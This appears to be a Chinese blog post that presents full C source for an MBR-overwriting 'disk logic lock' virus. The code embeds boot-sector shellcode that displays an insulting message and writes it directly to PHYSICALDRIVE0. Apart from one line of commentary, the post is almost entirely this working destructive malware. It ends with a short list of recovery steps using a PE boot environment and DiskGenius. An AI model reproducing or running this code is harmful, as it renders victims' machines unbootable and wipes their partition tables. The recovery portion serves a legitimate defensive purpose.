硬盘逻辑锁病毒源代码分析&恢复方法-HeiBai.Org

先研究一下硬盘逻辑锁代码。主要是重构MBR以及写入。

附上代码:

#include#include#include#include//这一段是 shellcode 可以修改// I am virus! Fuck you unsigned char scode[] ="\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c""\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72""\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";int KillMBR();int main(){
KillMBR(); return 0;
}int KillMBR(){
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR[512] = { 0 }; // 重新构造MBR
memcpy(pMBR, scode, sizeof(scode)-1);
pMBR[510] = 0x55;
pMBR[511] = 0xAA; //打开磁盘
hDevice = CreateFile
(
_T("\\\\.\\PHYSICALDRIVE0"),
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL
); if (hDevice == INVALID_HANDLE_VALUE)//打开失败 返回
return -1;
DeviceIoControl
(
hDevice,
FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0,
&dwBytesReturned, NULL
); // 写入病毒内容
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0,
&dwBytesReturned, NULL
); //关闭磁盘
CloseHandle(hDevice);
ExitProcess(-1); return 0;
}

硬盘逻辑锁 硬盘逻辑锁病毒源代码分析&恢复方法 技术文章

如果不慎运行，恢复办法:
1.启动到PE环境下
2.运行DiskGenius->菜单->搜索丢失的分区 并按提示重建分区表
3.菜单->重建引导记录
4.保存重启即可